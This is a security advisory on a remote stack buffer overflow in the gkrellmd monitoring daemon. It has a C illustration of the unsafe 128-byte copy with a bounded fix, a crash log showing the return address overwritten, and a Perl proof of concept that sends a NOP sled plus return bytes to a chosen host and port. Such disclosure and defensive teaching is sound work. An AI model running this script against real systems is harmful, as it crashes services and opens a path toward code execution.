GKrellM is a single-process stack of system monitors which supports applying themes to match its appearance to your window manager, Gtk, or any other theme. The gkrellmd daemon contains a buffer overflow that lets a remote attacker crash it and potentially execute arbitrary code.
Credit:
The information has been provided by dodo.
When a client sends data to gkrellmd, the daemon stores it in a fixed-size buffer of 128 bytes without checking that the received data fits. Longer input overwrites adjacent stack memory, including the saved return address, which crashes the daemon and can lead to remote code execution.
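As an added illustration (not gkrellmd's source and not part of the original advisory), the C below models the unsafe pattern described above next to a bounded replacement. The 128-byte buffer size is taken from the advisory; the function names, the "gkrellm <version>" greeting handling and the constructed inputs are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Per-client receive buffer size as described in the advisory. */
#define CLIENT_BUF_SIZE 128

/* Hypothetical model of the unsafe pattern: data from the socket is copied
 * into a fixed 128-byte stack buffer with no length check, so anything longer
 * overwrites what sits above the buffer on the stack (saved registers, return
 * address).  Illustration only: calling it with len >= CLIENT_BUF_SIZE is
 * undefined behaviour, which is exactly the advisory's crash. */
static int handle_client_unsafe(const char *data, size_t len)
{
    char buf[CLIENT_BUF_SIZE];
    memcpy(buf, data, len);          /* no bound check: len may exceed 128 */
    buf[len] = '\0';                 /* also out of bounds when len >= 128 */
    return (int)strlen(buf);
}

/* Hardened copy (assumed name): explicit length check before the copy.
 * Returns 0 and fills `out` (NUL-terminated) when the message fits,
 * -1 when it does not.  The caller should then drop the client rather
 * than truncate and carry on parsing a partial message. */
int read_client_line(const char *data, size_t len, char *out, size_t outlen)
{
    if (outlen == 0)
        return -1;
    if (len >= outlen)               /* need room for the terminating NUL */
        return -1;
    memcpy(out, data, len);
    out[len] = '\0';
    return 0;
}

/* Handler modelled on gkrellmd's client greeting (assumed format
 * "gkrellm <version>\n"): accepts greetings that fit in the buffer, copies
 * the version string to `client_out`, and rejects everything else.
 * Returns 1 if accepted, 0 if rejected. */
int handle_client_line(const char *data, size_t len,
                       char *client_out, size_t outlen)
{
    char buf[CLIENT_BUF_SIZE];
    size_t n;

    if (read_client_line(data, len, buf, sizeof buf) != 0)
        return 0;                    /* overlong: would have overflowed */
    n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n')
        buf[--n] = '\0';
    if (strncmp(buf, "gkrellm ", 8) != 0)
        return 0;
    snprintf(client_out, outlen, "%s", buf + 8);
    return 1;
}

/* Constructed input: the 141-byte run of 'A' from the advisory's crash log.
 * Returns the handler's verdict (0 = rejected). */
int demo_overlong_rejected(void)
{
    char payload[141];
    char client[64];
    memset(payload, 'A', sizeof payload);
    return handle_client_line(payload, sizeof payload, client, sizeof client);
}

int main(void)
{
    const char *greeting = "gkrellm 2.1.10\n";
    char version[64];

    /* The unsafe model is only exercised with input that fits. */
    printf("unsafe handler stored %d bytes\n",
           handle_client_unsafe(greeting, strlen(greeting)));
    printf("greeting accepted=%d version=%s\n",
           handle_client_line(greeting, strlen(greeting), version, sizeof version),
           version);
    printf("141-byte payload accepted=%d\n", demo_overlong_rejected());
    return 0;
}
```

The important design point is that the hardened handler refuses the message outright instead of truncating it: a silently truncated greeting or command would still be parsed, and the next read would begin in the middle of the attacker's data.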
Example:
Verbose GKrellMd output:
cyride-bash# gkrellmd -P 661 -V
update_HZ=3
connect string from client: gkrellm 2.1.10
gkrellmd accepted client: dwop.darkwired.da.ru:43755
received 141 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
Segmentation fault (core dumped)
Debugger output (eip):
cyride-bash# gdb gkrellmd gkrellmd.core
(gdb) info reg
eip 0x41414141 0x41414141
EIP holds 0x41414141 ("AAAA"): the overflow reached the saved return address, so a crafted payload controls where execution resumes after the function returns.
Vendor status:
The vendor was contacted on 22-06-2003.
Proof of concept:
gkrellmcrash.pl:
#!/usr/bin/perl
#
# proof of concept code
# tested: gkrellmd 2.1.10
#
# Sends a client greeting followed by 160 bytes (156 NOPs plus "BCDE"),
# well past the daemon's 128-byte buffer, so the saved return address is
# overwritten with the bytes "BCDE" and the daemon crashes.
use strict;
use warnings;
use IO::Socket;

if (@ARGV < 2) {
    print "usage: ./gkrellmcrash.pl <host> <port>\n";
    exit(-1);
}
my ($host, $port) = @ARGV;

my $exploitstring = "\x90" x 156;   # NOP sled used as padding
my $eip           = "BCDE";         # lands in the saved return address

my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
) or die "unable to connect to $host:$port ($!)\n";

print $socket "gkrellm 2.1.10\n";   # tell the daemon which client we have
sleep(1);
print $socket $exploitstring, $eip;
close($socket);